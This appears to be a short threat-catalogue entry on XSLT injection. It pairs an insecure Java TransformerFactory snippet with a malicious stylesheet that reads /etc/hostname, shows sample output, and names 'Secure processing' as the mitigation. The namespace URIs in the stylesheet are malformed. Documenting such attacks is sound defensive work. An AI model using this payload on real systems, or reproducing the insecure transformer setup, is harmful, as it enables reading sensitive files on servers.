A threat actor may interfere with an application's processing of extensible stylesheet language transformations (XSLT) for extensible markup language (XML) to read or modify data on the target

1. Threat actor submits a malicious request to a target that has a vulnerable XSLT processor
2. The target's XSLT processor parses the malicious file (Based on the processor and the version of the XSLT specification)

Result result = new StreamResult(System.out);
Source xslt = new StreamSource(new File("test.xslt"));
Source xml = new StreamSource(new File("test.xml"));
TransformerFactory factory = TransformerFactory.newInstance();
Transformer transformer = factory.newTransformer(xslt);
transformer.transform(xml, result);

<xsl:stylesheet version="1.0" xmlns:xsl="http:https://www.w3.org/1999/XSL/Transform" xmlns:php="http:https://php.net/xs">
  <xsl:template match="/">
    <xsl:copy-of select=" document('/etc/hostname')"/>
  </xsl:template>
</xsl:stylesheet>

usystem01

High

• XSLT Injection

• Read & Write data
• Command Execution

• Secure processing

012e4a7b-b8ae-44a6-9b6f-08d24cf7dba2

• acunetix